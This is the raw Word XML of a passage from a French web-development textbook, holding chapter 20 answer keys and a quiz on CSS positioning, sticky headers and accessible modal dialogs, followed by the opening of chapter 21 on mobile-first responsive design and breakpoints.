      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sur mobile, vérifiez que le badge ne recouvre pas le titre : ajoutez un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>padding-inline-end</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> à la zone de titre si nécessaire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 20.2</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thead th {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  position: sticky;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  top: 0;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  z-index: 2;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background: #0f2e4c;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  color: #fff;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>/* Le conteneur défilant doit avoir une hauteur limitée */</w:t>
        <w:br/>
        <w:t>.tableau { max-height: 60vh; overflow: auto; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Sans fond opaque, les lignes défilent derrière le texte de l'en-tête.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>z-index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évite que les cellules du corps ne recouvrent l'en-tête ; il fonctionne parce que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est positionné.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 20.3</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&lt;dialog id="suppression" aria-labelledby="titre-supp"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;h2 id="titre-supp"&gt;Supprimer la fiche ?&lt;/h2&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;p&gt;Cette action ne peut pas être annulée.&lt;/p&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;form method="dialog"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;button value="annuler"&gt;Annuler&lt;/button&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;button value="confirmer"&gt;Supprimer&lt;/button&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/form&gt;</w:t>
        <w:br/>
        <w:t>&lt;/dialog&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;script&gt;</w:t>
        <w:br/>
        <w:t>const d = document.getElementById("suppression");</w:t>
        <w:br/>
        <w:t>d.showModal();</w:t>
        <w:br/>
        <w:t>d.addEventListener("close", () =&gt; declencheur.focus());</w:t>
        <w:br/>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>showModal()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> bloque l'arrière-plan, piège le focus et ferme sur Échap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Au retour, le focus doit revenir sur le bouton qui a ouvert la boîte, sinon l'utilisateur clavier repart du début de la page.</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 xml:space="preserve">Par rapport à quoi se positionne un élément </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>absolute</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Toujours la fenêtre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Son ancêtre positionné le plus proche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Son parent direct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 body</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 xml:space="preserve">Quel attribut est indispensable pour que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sticky</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> fonctionne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z-index</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top</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou un autre seuil</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overflow</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transform</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Qu'est-ce qui crée un contexte d'empilement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z-index: 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur un élément statique</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transform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>opacity &lt; 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>filter</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display: flex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> seul</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margin: auto</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Quelle méthode ouvre une modale en bloquant l'arrière-plan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dialog.show()</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dialog.showModal()</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dialog.open()</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display: block</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>inset-block-end: 1rem</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Définit la marge basse logique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Positionne à 1 rem du bas (logique)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Ajoute un espacement interne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Crée une animation</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Sans ancêtre positionné, la référence est le bloc initial (la fenêtre) ; d'où l'usage courant de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>relative</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur le conteneur.</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Sans seuil, l'élément n'a aucune raison de se figer : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>top: 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> par exemple.</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Ces propriétés créent un contexte qui isole les </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>z-index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> des enfants.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>showModal()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> active le mode modal : fond inerte, focus piégé, fermeture par Échap.</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C'est l'équivalent logique de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>bottom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : il s'adapte au sens d'écriture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>21. Design responsive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Concevoir pour toutes les tailles d'écran, sans multiplier les versions du site.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Intermédiaire · Prérequis : chapitre 20</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Écrire des media queries fondées sur le contenu, pas sur des appareils.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Adopter une démarche mobile-first et la justifier.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Utiliser les points de rupture avec parcimonie.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Concevoir des images et des composants adaptatifs.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Tester une interface dans des conditions réalistes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>21.1 Pourquoi le responsive n'est pas une mode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Plus de la moitié du trafic web mondial provient d'un téléphone. Les largeurs d'écran varient de 320 à 3840 pixels, et l'utilisateur peut redimensionner sa fenêtre à tout moment. Une mise en page figée casse dès que la largeur change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2603500"/>
            <wp:docPr id="31" name="Picture 31"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f29.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2603500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.29 — Quatre décisions qui ont façonné le responsive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoteFigure"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>Chaque étape a ajouté un outil, sans remplacer les précédents.</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RESPONSIVE DESIGN</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Approche de conception où la mise en page s'adapte à l'espace disponible, plutôt que de présenter une version différente par appareil.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>21.2 Mobile-first</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La démarche mobile-first consiste à écrire les styles pour le plus petit écran, puis à les enrichir par des media queries ascendantes (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>min-width</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). Le navigateur applique peu de règles sur téléphone, ce qui économise du traitement et simplifie le CSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois paliers, une seule direction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Mobile-first : on part du plus simple */</w:t>
        <w:br/>
        <w:t>.galerie { display: grid; gap: 1rem; grid-template-columns: 1fr; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>@media (min-width: 40rem) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .galerie { grid-template-columns: repeat(2, minmax(0, 1fr)); }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>@media (min-width: 64rem) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .galerie { grid-template-columns: repeat(3, minmax(0, 1fr)); }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.67 — Trois approches de conception adaptative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186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Approche</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="186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Sens</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Avantages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="243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Limites</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1860"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mobile-first</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1860"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>min-width</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CSS minimal, priorité au contenu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2432"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Styles desktop en surcouche</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1860"/>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Desktop-first</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="186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max-width</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Rapide si la maquette est desktop</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="243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Surcharge mobile lourde</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1860"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Intrinsèque</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1860"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sans media query</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Robuste, peu de code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2432"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Moins de contrôle fin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>21.3 Choisir ses points de rupture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un point de rupture se choisit là où </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>le contenu se casse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, pas là où un appareil particulier s'arrête. Les valeurs 320, 768 et 1024 sont des repères pratiques, pas des dogmes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre points de rupture, rarement plus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Repères fréquents, à adapter au contenu */</w:t>
        <w:br/>
        <w:t>@media (min-width: 30rem) { }   /* 480 px : téléphone large */</w:t>
        <w:br/>
        <w:t>@media (min-width: 48rem) { }   /* 768 px : tablette */</w:t>
        <w:br/>
        <w:t>@media (min-width: 64rem) { }   /* 1024 px : ordinateur portable */</w:t>
        <w:br/>
        <w:t>@media (min-width: 80rem) { }   /* 1280 px : grand écran */</w:t>
